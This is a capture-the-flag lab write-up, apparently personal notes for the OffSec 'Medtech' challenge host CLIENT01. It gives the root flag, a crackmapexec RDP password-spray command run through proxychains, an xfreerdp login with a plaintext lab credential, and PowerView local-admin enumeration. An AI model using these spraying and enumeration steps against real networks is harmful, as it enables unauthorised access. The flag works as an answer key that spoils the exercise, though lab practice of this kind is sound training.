172.16.174.82 (CLIENT01)

Flags Obtained

Local:
    
    
Root:
    bed2ef52cb5f6eecaa9335e40c7c0953

Access method

proxychains crackmapexec rdp 172.16.116.82 -d medtech.com -u users.txt -p password.txt --continue-on-success

proxychains xfreerdp /d:medtech.com /u:yoshi /p:Mushroom\! /v:172.16.116.82 +clipboard /cert:ignore /size:70% +drive:KALISHARE,/home/kali/OffSec/ChallengeLabs/Challenge1_Medtech/hostdir/

Admin Enumeration

Reason:
    Ran the following on DEV04
    > Import-Module ./PowerView.ps1
    > Find-LocalAdminAccess
        # Client01 will show up in the output
        # This means that the user (yoshi) has local admin access on Client01

Via the GUI, navigate to C:\Users\Administrator\Desktop\proof.txt
- Press continue for any UAC alert generated

Previous172.16.174.14 (NTP)Next172.16.174.83 (CLIENT02)

Last updated 1 year ago

hashtagAccess method

hashtagAdmin Enumeration

Access method

Admin Enumeration